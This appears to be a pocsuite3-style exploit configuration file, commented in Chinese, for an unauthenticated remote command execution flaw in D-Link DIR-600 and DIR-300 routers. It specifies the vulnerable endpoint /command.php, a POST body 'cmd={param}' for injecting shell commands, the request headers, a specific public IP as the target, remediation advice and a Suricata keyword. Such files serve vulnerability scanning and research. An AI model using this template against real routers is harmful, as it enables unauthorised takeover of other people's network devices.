CLASSNAME = 'DLink_DIR_600_CNVD_2013_00967'
VUL_ID = 'LDY-2022-00135250'
VUL_DATE = '2013-02-17'
CREATEDATE = '2022-12-28'
UPDATEDATE = '2022-12-28'
APP_NAME = 'DLink_DIR_600'
VUL_NAME = '远程命令执行(RCE)' #漏洞名称
VUL_NUM  = 'CNVD-2013-00967' #漏洞编号
CVE_NUM = '' #CVE编号
CNVD_NUM = 'CNVD-2013-00967' #CNVD编号
VUL_TYPE = 'CODE_EXECUTION' # 必填，漏洞类型，参考 pocsuite3 VUL_TYPE的取值范围
POC_CATEGORY = 'EXPLOITS.WEBAPP' # 必填，漏洞分类，参考 pocsuite3 POC_CATEGORY的取值范围
SEVERITY = 'Critical' # 必填，严重等级，取值范围 Critical , High , Medium, Low
REQAUTH = 'False' # 必填，boolen值，该漏洞验证或利用是否需要先认证
FINGERPRINT_NAMES = 'DLink_DIR_600' # 必填，当命中哪些指纹后，可使用该poc。列表中是指纹的名称
APP_MAIN_PORT = '80' # 必填，该应用的默认配置端口，用于快速扫描模式，若无法确认可以写80
APPVERSION = 'D-Link=DIR-300||D-Link=DIR-600' # 必填，漏洞影响的版本号
APP_POWER_LINK = 'http://www.dlink.com.cn/' # 非必填，应用厂商链接
DESC = 'D-Link DIR-600和DIR-300是无线路由设备。D-Link DIR-600和DIR-300存在命令执行漏洞。由于cmd参数缺少访问限制和输入验证，攻击者可以利用漏洞注入并执行任意shell命令。'
SUGGEST = '1、严格过滤用户输入的数据，禁止执行非预期系统命令。2、减少或不使用代码或命令执行函数。3、客户端提交的变量在放入函数前进行检测。4、减少或不使用危险函数'
HASEXP = 'True' # 必填，boolen值，是否包含exp
TARGETS = 'http://2.107.247.122/' # 必填，该Poc适用的目标，string类型
SURICATA_RULES = 'cmd' # 必填，suricata格式的检测规则,这里只需要填写匹配流量包关键词即可
COMMAND = ''
FILE_PATH = '#' #如果不使用file_path=传shell地址，可以使用"#"进行传参数
REFERENCES = 'https://www.cnvd.org.cn/flaw/show/CNVD-2013-00967' # 非必填，漏洞相关参考链接
URI = '/command.php' #payload请求uri
PAYLOAD_DATA = 'cmd={param}' #传入的data数据
METHOD = 'post' # request 请求方式 get、post
HEADERS = "{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','Content-Type': 'application/x-www-form-urlencoded'}"
ATTACK_PAYLOAD_DATA = '1'
ATTACK_URI = "" #利用payload请求uri





